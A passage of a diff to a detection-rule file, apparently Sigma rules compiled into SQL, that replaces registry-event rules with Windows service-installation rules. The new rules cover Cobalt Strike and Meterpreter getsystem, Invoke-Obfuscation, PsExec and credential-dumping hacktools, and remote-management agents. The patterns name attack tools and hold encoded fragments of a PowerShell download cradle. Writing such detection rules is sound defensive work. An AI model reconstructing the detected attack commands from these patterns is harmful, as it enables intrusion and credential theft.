getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1546.009" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Highly unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", - "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_service_install_susp_double_ampersand.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "New PDQDeploy Service - Server Side", + "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "status": "experimental", + "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_service_install_pdqdeploy.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", + "id": "175997c5-803c-4b08-8bb0-70b099f47595", "status": "experimental", - "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": "win_system_invoke_obfuscation_via_compress_services.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", - "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Mesh Agent Service Installation", + "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "status": "experimental", + "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_install_mesh_agent.yml" }, { - "title": "Windows Registry Trust Record Modification", - "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Alerts on trust record modification within the registry, indicating usage of macros", - "author": "Antonlovesdnb", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_trust_record_modification.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "title": "TacticalRMM Service Installation", + "id": "4bb79b62-ef12-4861-981d-2aab43fab642", + "status": "experimental", + "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_service_install_tacticalrmm.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "Path To Screensaver Binary Modified", - "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "status": "test", - "description": "Detects value modification of registry key containing path to binary used as screensaver.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", + "attack.execution", "attack.privilege_escalation", - "attack.t1546.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate modification of screensaver" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_modify_screensaver_binary_path.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", - "status": "test", - "description": "Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "title": "Important Windows Service Terminated With Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE '\\')))" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", - "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", - "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", + "status": "test", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 